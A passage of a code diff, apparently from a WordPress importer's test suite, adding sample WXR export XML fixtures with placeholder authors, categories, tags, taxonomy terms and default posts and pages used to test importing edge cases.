<wp:tag><wp:term_id>36</wp:term_id><wp:tag_slug>tag-3</wp:tag_slug><wp:tag_name><![CDATA[tag 3]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>37</wp:term_id><wp:tag_slug>tag-4</wp:tag_slug><wp:tag_name><![CDATA[tag 4]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>38</wp:term_id><wp:tag_slug>tag-5</wp:tag_slug><wp:tag_name><![CDATA[tag 5]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>39</wp:term_id><wp:tag_slug>tentage</wp:tag_slug><wp:tag_name><![CDATA[Tentage]]></wp:tag_name></wp:tag>
<wp:term><wp:term_id>40</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>bieup</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[bieup]]></wp:term_name></wp:term>
<wp:term><wp:term_id>41</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>blah</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[blah]]></wp:term_name></wp:term>
<wp:term><wp:term_id>42</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>digeut</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[digeut]]></wp:term_name></wp:term>
<wp:term><wp:term_id>43</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>giyeok</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[giyeok]]></wp:term_name></wp:term>
<wp:term><wp:term_id>44</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>halb</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[halb]]></wp:term_name></wp:term>
<wp:term><wp:term_id>45</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>mieum</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[mieum]]></wp:term_name></wp:term>
<wp:term><wp:term_id>46</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>nieun</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[nieun]]></wp:term_name></wp:term>
<wp:term><wp:term_id>47</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>parent-2</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[Parent]]></wp:term_name></wp:term>
<wp:term><wp:term_id>48</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>rieul</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[rieul]]></wp:term_name></wp:term>
<wp:term><wp:term_id>49</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>siot</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[siot]]></wp:term_name></wp:term>
<wp:term><wp:term_id>50</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>tax-1</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[TAX 1]]></wp:term_name></wp:term>
<wp:term><wp:term_id>51</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>tax-2</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[TAX 2]]></wp:term_name></wp:term>
<wp:term><wp:term_id>52</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>blah-halb</wp:term_slug><wp:term_parent>halb</wp:term_parent><wp:term_name><![CDATA[blah]]></wp:term_name></wp:term>
<wp:term><wp:term_id>53</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>child-parent-2</wp:term_slug><wp:term_parent>parent-2</wp:term_parent><wp:term_name><![CDATA[chilD]]></wp:term_name></wp:term>
</channel>
</rss>

90
tests/data/export/missing-version-tag.xml Normal file
View File

@ -0,0 +1,90 @@
<?xml version="1.0" encoding="UTF-8" ?>
<!-- This is a WordPress eXtended RSS file generated by WordPress as an export of your site. -->
<!-- It contains information about your site's posts, pages, comments, categories, and other content. -->
<!-- You may use this file to transfer that content from one site to another. -->
<!-- NB: This file is not intended to serve as a complete backup of your blog. -->
<!-- To import this information into a WordPress site follow these steps: -->
<!-- 1. Log in to that site as an administrator. -->
<!-- 2. Go to Tools: Import in the WordPress admin panel. -->
<!-- 3. Install the "WordPress" importer from the list. -->
<!-- 4. Activate & Run Importer. -->
<!-- 5. Upload this file using the form provided on that page. -->
<!-- 6. You will first be asked to map the authors in this export file to users -->
<!-- on the site. For each author, you may choose to map to an -->
<!-- existing user on the site or to create a new user. -->
<!-- 7. WordPress will then import each of the posts, pages comments, categories, etc. -->
<!-- contained in this file into your blog. -->
<!-- generator="WordPress/3.1-alpha" created="2010-10-09 15:12" -->
<rss version="2.0"
xmlns:excerpt="http://wordpress.org/export/1.1/excerpt/"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:wp="http://wordpress.org/export/1.1/"
>
<channel>
<title>WXR Test Data</title>
<link>http://localhost/</link>
<description>Blog with sample content for testing</description>
<pubDate>Sat, 09 Oct 2010 15:12:29 +0000</pubDate>
<language>en</language>
<wp:base_site_url>http://localhost/</wp:base_site_url>
<wp:base_blog_url>http://localhost/</wp:base_blog_url>
<wp:author><wp:author_login>john</wp:author_login><wp:author_email>johndoe@example.org</wp:author_email><wp:author_display_name><![CDATA[John Doe]]></wp:author_display_name><wp:author_first_name><![CDATA[John]]></wp:author_first_name><wp:author_last_name><![CDATA[Doe]]></wp:author_last_name></wp:author>
<wp:category><wp:term_id>1</wp:term_id><wp:category_nicename>alpha</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[alpha]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>2</wp:term_id><wp:category_nicename>bar</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Bar]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>3</wp:term_id><wp:category_nicename>beta</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[beta]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>4</wp:term_id><wp:category_nicename>delta</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[delta]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>5</wp:term_id><wp:category_nicename>epsilon</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[epsilon]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>6</wp:term_id><wp:category_nicename>eta</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[eta]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>7</wp:term_id><wp:category_nicename>foo</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Foo]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>8</wp:term_id><wp:category_nicename>foo-bar</wp:category_nicename><wp:category_parent>bar</wp:category_parent><wp:cat_name><![CDATA[Foo]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>9</wp:term_id><wp:category_nicename>gamma</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[gamma]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>10</wp:term_id><wp:category_nicename>iota</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[iota]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>11</wp:term_id><wp:category_nicename>kappa</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[kappa]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>12</wp:term_id><wp:category_nicename>lambda</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[lambda]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>13</wp:term_id><wp:category_nicename>level-1</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Level 1]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>14</wp:term_id><wp:category_nicename>level-2</wp:category_nicename><wp:category_parent>level-1</wp:category_parent><wp:cat_name><![CDATA[Level 2]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>15</wp:term_id><wp:category_nicename>level-3</wp:category_nicename><wp:category_parent>level-2</wp:category_parent><wp:cat_name><![CDATA[Level 3]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>16</wp:term_id><wp:category_nicename>parent</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[pArEnT]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>17</wp:term_id><wp:category_nicename>theta</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[theta]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>18</wp:term_id><wp:category_nicename>uncategorized</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Uncategorized]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>19</wp:term_id><wp:category_nicename>zeta</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[zeta]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>20</wp:term_id><wp:category_nicename>also-level-3</wp:category_nicename><wp:category_parent>level-2</wp:category_parent><wp:cat_name><![CDATA[Also Level 3]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>21</wp:term_id><wp:category_nicename>child</wp:category_nicename><wp:category_parent>parent</wp:category_parent><wp:cat_name><![CDATA[CHILD]]></wp:cat_name></wp:category>
<wp:tag><wp:term_id>22</wp:term_id><wp:tag_slug>clippable</wp:tag_slug><wp:tag_name><![CDATA[Clippable]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>23</wp:term_id><wp:tag_slug>deuterogamy</wp:tag_slug><wp:tag_name><![CDATA[Deuterogamy]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>24</wp:term_id><wp:tag_slug>entablement</wp:tag_slug><wp:tag_name><![CDATA[Entablement]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>25</wp:term_id><wp:tag_slug>intermembral</wp:tag_slug><wp:tag_name><![CDATA[Intermembral]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>26</wp:term_id><wp:tag_slug>masticatory</wp:tag_slug><wp:tag_name><![CDATA[Masticatory]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>27</wp:term_id><wp:tag_slug>obligato</wp:tag_slug><wp:tag_name><![CDATA[Obligato]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>28</wp:term_id><wp:tag_slug>occultation</wp:tag_slug><wp:tag_name><![CDATA[Occultation]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>29</wp:term_id><wp:tag_slug>onion</wp:tag_slug><wp:tag_name><![CDATA[Onion]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>30</wp:term_id><wp:tag_slug>pontonier</wp:tag_slug><wp:tag_name><![CDATA[Pontonier]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>31</wp:term_id><wp:tag_slug>rooftree</wp:tag_slug><wp:tag_name><![CDATA[Rooftree]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>32</wp:term_id><wp:tag_slug>saccule</wp:tag_slug><wp:tag_name><![CDATA[Saccule]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>33</wp:term_id><wp:tag_slug>salpa</wp:tag_slug><wp:tag_name><![CDATA[Salpa]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>34</wp:term_id><wp:tag_slug>tag-1</wp:tag_slug><wp:tag_name><![CDATA[tag 1]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>35</wp:term_id><wp:tag_slug>tag-2</wp:tag_slug><wp:tag_name><![CDATA[tag 2]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>36</wp:term_id><wp:tag_slug>tag-3</wp:tag_slug><wp:tag_name><![CDATA[tag 3]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>37</wp:term_id><wp:tag_slug>tag-4</wp:tag_slug><wp:tag_name><![CDATA[tag 4]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>38</wp:term_id><wp:tag_slug>tag-5</wp:tag_slug><wp:tag_name><![CDATA[tag 5]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>39</wp:term_id><wp:tag_slug>tentage</wp:tag_slug><wp:tag_name><![CDATA[Tentage]]></wp:tag_name></wp:tag>
<wp:term><wp:term_id>40</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>bieup</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[bieup]]></wp:term_name></wp:term>
<wp:term><wp:term_id>41</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>blah</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[blah]]></wp:term_name></wp:term>
<wp:term><wp:term_id>42</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>digeut</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[digeut]]></wp:term_name></wp:term>
<wp:term><wp:term_id>43</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>giyeok</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[giyeok]]></wp:term_name></wp:term>
<wp:term><wp:term_id>44</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>halb</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[halb]]></wp:term_name></wp:term>
<wp:term><wp:term_id>45</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>mieum</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[mieum]]></wp:term_name></wp:term>
<wp:term><wp:term_id>46</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>nieun</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[nieun]]></wp:term_name></wp:term>
<wp:term><wp:term_id>47</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>parent-2</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[Parent]]></wp:term_name></wp:term>
<wp:term><wp:term_id>48</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>rieul</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[rieul]]></wp:term_name></wp:term>
<wp:term><wp:term_id>49</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>siot</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[siot]]></wp:term_name></wp:term>
<wp:term><wp:term_id>50</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>tax-1</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[TAX 1]]></wp:term_name></wp:term>
<wp:term><wp:term_id>51</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>tax-2</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[TAX 2]]></wp:term_name></wp:term>
<wp:term><wp:term_id>52</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>blah-halb</wp:term_slug><wp:term_parent>halb</wp:term_parent><wp:term_name><![CDATA[blah]]></wp:term_name></wp:term>
<wp:term><wp:term_id>53</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>child-parent-2</wp:term_slug><wp:term_parent>parent-2</wp:term_parent><wp:term_name><![CDATA[chilD]]></wp:term_name></wp:term>
</channel>
</rss>

447
tests/data/export/small-export.xml Normal file
View File

@ -0,0 +1,447 @@
<?xml version="1.0" encoding="UTF-8" ?>
<!-- This is a WordPress eXtended RSS file generated by WordPress as an export of your site. -->
<!-- It contains information about your site's posts, pages, comments, categories, and other content. -->
<!-- You may use this file to transfer that content from one site to another. -->
<!-- This file is not intended to serve as a complete backup of your site. -->
<!-- To import this information into a WordPress site follow these steps: -->
<!-- 1. Log in to that site as an administrator. -->
<!-- 2. Go to Tools: Import in the WordPress admin panel. -->
<!-- 3. Install the "WordPress" importer from the list. -->
<!-- 4. Activate & Run Importer. -->
<!-- 5. Upload this file using the form provided on that page. -->
<!-- 6. You will first be asked to map the authors in this export file to users -->
<!-- on the site. For each author, you may choose to map to an -->
<!-- existing user on the site or to create a new user. -->
<!-- 7. WordPress will then import each of the posts, pages, comments, categories, etc. -->
<!-- contained in this file into your site. -->
<!-- generator="WordPress/3.1-RC2-17315" created="2011-01-18 08:06" -->
<rss version="2.0"
xmlns:excerpt="http://wordpress.org/export/1.1/excerpt/"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:wp="http://wordpress.org/export/1.1/"
>
<channel>
<title>trunk</title>
<link>http://localhost/</link>
<description>Just another WordPress site</description>
<pubDate>Tue, 18 Jan 2011 08:06:21 +0000</pubDate>
<language>en</language>
<wp:wxr_version>1.1</wp:wxr_version>
<wp:base_site_url>http://localhost/</wp:base_site_url>
<wp:base_blog_url>http://localhost/</wp:base_blog_url>
<wp:author><wp:author_id>1</wp:author_id><wp:author_login>admin</wp:author_login><wp:author_email>local@host.null</wp:author_email><wp:author_display_name><![CDATA[admin]]></wp:author_display_name><wp:author_first_name><![CDATA[]]></wp:author_first_name><wp:author_last_name><![CDATA[]]></wp:author_last_name></wp:author>
<wp:author><wp:author_id>2</wp:author_id><wp:author_login>editor</wp:author_login><wp:author_email>editor@example.org</wp:author_email><wp:author_display_name><![CDATA[editor]]></wp:author_display_name><wp:author_first_name><![CDATA[FirstName]]></wp:author_first_name><wp:author_last_name><![CDATA[LastName]]></wp:author_last_name></wp:author>
<wp:author><wp:author_id>3</wp:author_id><wp:author_login>author</wp:author_login><wp:author_email>author@example.org</wp:author_email><wp:author_display_name><![CDATA[author]]></wp:author_display_name><wp:author_first_name><![CDATA[]]></wp:author_first_name><wp:author_last_name><![CDATA[]]></wp:author_last_name></wp:author>
<wp:category><wp:term_id>8</wp:term_id><wp:category_nicename>alpha</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[alpha]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>4</wp:term_id><wp:category_nicename>bar</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Bar]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>9</wp:term_id><wp:category_nicename>beta</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[BETA]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>29</wp:term_id><wp:category_nicename>chi</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[CHI]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>11</wp:term_id><wp:category_nicename>delta</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[dElta]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>12</wp:term_id><wp:category_nicename>epsilon</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[epsilon]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>14</wp:term_id><wp:category_nicename>eta</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[eta]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>3</wp:term_id><wp:category_nicename>foo</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Foo]]></wp:cat_name><wp:category_description><![CDATA[The top-level foo category]]></wp:category_description></wp:category>
<wp:category><wp:term_id>5</wp:term_id><wp:category_nicename>foo-bar</wp:category_nicename><wp:category_parent>bar</wp:category_parent><wp:cat_name><![CDATA[Foo]]></wp:cat_name><wp:category_description><![CDATA[The child foo category]]></wp:category_description></wp:category>
<wp:category><wp:term_id>10</wp:term_id><wp:category_nicename>gamma</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[gaMMA]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>16</wp:term_id><wp:category_nicename>iota</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[IOTA]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>17</wp:term_id><wp:category_nicename>kappa</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Kappa]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>18</wp:term_id><wp:category_nicename>lambda</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[lambda]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>19</wp:term_id><wp:category_nicename>mu</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[MU]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>20</wp:term_id><wp:category_nicename>nu</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Nu]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>31</wp:term_id><wp:category_nicename>omega</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Omega]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>22</wp:term_id><wp:category_nicename>omicron</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Omicron]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>28</wp:term_id><wp:category_nicename>phi</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Phi]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>23</wp:term_id><wp:category_nicename>pi</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Pi]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>30</wp:term_id><wp:category_nicename>psi</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Psi]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>24</wp:term_id><wp:category_nicename>rho</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Rho]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>25</wp:term_id><wp:category_nicename>sigma</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Sigma]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>26</wp:term_id><wp:category_nicename>tau</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[tAu]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>15</wp:term_id><wp:category_nicename>theta</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[THeta]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>1</wp:term_id><wp:category_nicename>uncategorized</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Uncategorized]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>32</wp:term_id><wp:category_nicename>unused-category</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Unused category]]></wp:cat_name><wp:category_description><![CDATA[Category will not be associated with any posts.]]></wp:category_description></wp:category>
<wp:category><wp:term_id>27</wp:term_id><wp:category_nicename>upsilon</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[uPsIlOn]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>21</wp:term_id><wp:category_nicename>xi</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Xi]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>13</wp:term_id><wp:category_nicename>zeta</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[zeta]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>7</wp:term_id><wp:category_nicename>eternity</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[远征手记]]></wp:cat_name><wp:category_description><![CDATA[No more duplicate categories, #13364]]></wp:category_description></wp:category>
<wp:tag><wp:term_id>33</wp:term_id><wp:tag_slug>tag1</wp:tag_slug><wp:tag_name><![CDATA[Tag1]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>34</wp:term_id><wp:tag_slug>tag2</wp:tag_slug><wp:tag_name><![CDATA[Tag2]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>35</wp:term_id><wp:tag_slug>tag3</wp:tag_slug><wp:tag_name><![CDATA[Tag3]]></wp:tag_name></wp:tag>
<generator>http://wordpress.org/?v=3.1-RC2-17315</generator>
<item>
<title>Hello world!</title>
<link>http://localhost/?p=1</link>
<pubDate>Tue, 18 Jan 2011 07:40:14 +0000</pubDate>
<dc:creator>author</dc:creator>
<guid isPermaLink="false">http://localhost/?p=1</guid>
<description></description>
<content:encoded><![CDATA[Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>1</wp:post_id>
<wp:post_date>2011-01-18 07:40:14</wp:post_date>
<wp:post_date_gmt>2011-01-18 07:40:14</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name>hello-world</wp:post_name>
<wp:status>publish</wp:status>
<wp:post_parent>0</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>post</wp:post_type>
<wp:post_password></wp:post_password>
<wp:is_sticky>0</wp:is_sticky>
<category domain="category" nicename="uncategorized"><![CDATA[Uncategorized]]></category>
<wp:postmeta>
<wp:meta_key>Post by</wp:meta_key>
<wp:meta_value><![CDATA[author]]></wp:meta_value>
</wp:postmeta>
<wp:postmeta>
<wp:meta_key>_edit_last</wp:meta_key>
<wp:meta_value><![CDATA[1]]></wp:meta_value>
</wp:postmeta>
<wp:comment>
<wp:comment_id>1</wp:comment_id>
<wp:comment_author><![CDATA[Mr WordPress]]></wp:comment_author>
<wp:comment_author_email></wp:comment_author_email>
<wp:comment_author_url>http://wordpress.org/</wp:comment_author_url>
<wp:comment_author_IP></wp:comment_author_IP>
<wp:comment_date>2011-01-18 07:40:14</wp:comment_date>
<wp:comment_date_gmt>2011-01-18 07:40:14</wp:comment_date_gmt>
<wp:comment_content><![CDATA[Hi, this is a comment.<br />To delete a comment, just log in and view the post&#039;s comments. There you will have the option to edit or delete them.]]></wp:comment_content>
<wp:comment_approved>1</wp:comment_approved>
<wp:comment_type></wp:comment_type>
<wp:comment_parent>0</wp:comment_parent>
<wp:comment_user_id>0</wp:comment_user_id>
</wp:comment>
</item>
<item>
<title>Sample Page</title>
<link>http://localhost/?page_id=2</link>
<pubDate>Tue, 18 Jan 2011 07:40:14 +0000</pubDate>
<dc:creator>admin</dc:creator>
<guid isPermaLink="false">http://localhost/?page_id=2</guid>
<description></description>
<content:encoded><![CDATA[This is an example page. It's different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:
<blockquote>Hi there! I'm a bike messenger by day, aspiring actor by night, and this is my blog. I live in Los Angeles, have a great dog named Jack, and I like pi&#241;a coladas. (And gettin' caught in the rain.)</blockquote>
...or something like this:
<blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickies to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote>
As a new WordPress user, you should go to <a href="http://localhost/wp-admin/">your dashboard</a> to delete this page and create new pages for your content. Have fun!]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>2</wp:post_id>
<wp:post_date>2011-01-18 07:40:14</wp:post_date>
<wp:post_date_gmt>2011-01-18 07:40:14</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name>sample-page</wp:post_name>
<wp:status>publish</wp:status>
<wp:post_parent>0</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>page</wp:post_type>
<wp:post_password></wp:post_password>
<wp:is_sticky>0</wp:is_sticky>
<wp:postmeta>
<wp:meta_key>_wp_page_template</wp:meta_key>
<wp:meta_value><![CDATA[default]]></wp:meta_value>
</wp:postmeta>
</item>
<item>
<title>Child Page</title>
<link>http://localhost/?page_id=4</link>
<pubDate>Tue, 18 Jan 2011 07:45:50 +0000</pubDate>
<dc:creator>admin</dc:creator>
<guid isPermaLink="false">http://localhost/?page_id=4</guid>
<description></description>
<content:encoded><![CDATA[This child page appears before its parent in the export file.]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>4</wp:post_id>
<wp:post_date>2011-01-18 07:45:50</wp:post_date>
<wp:post_date_gmt>2011-01-18 07:45:50</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name>child-page</wp:post_name>
<wp:status>publish</wp:status>
<wp:post_parent>6</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>page</wp:post_type>
<wp:post_password></wp:post_password>
<wp:is_sticky>0</wp:is_sticky>
<wp:postmeta>
<wp:meta_key>_edit_last</wp:meta_key>
<wp:meta_value><![CDATA[1]]></wp:meta_value>
</wp:postmeta>
<wp:postmeta>
<wp:meta_key>_wp_page_template</wp:meta_key>
<wp:meta_value><![CDATA[default]]></wp:meta_value>
</wp:postmeta>
</item>
<item>
<title>Parent Page</title>
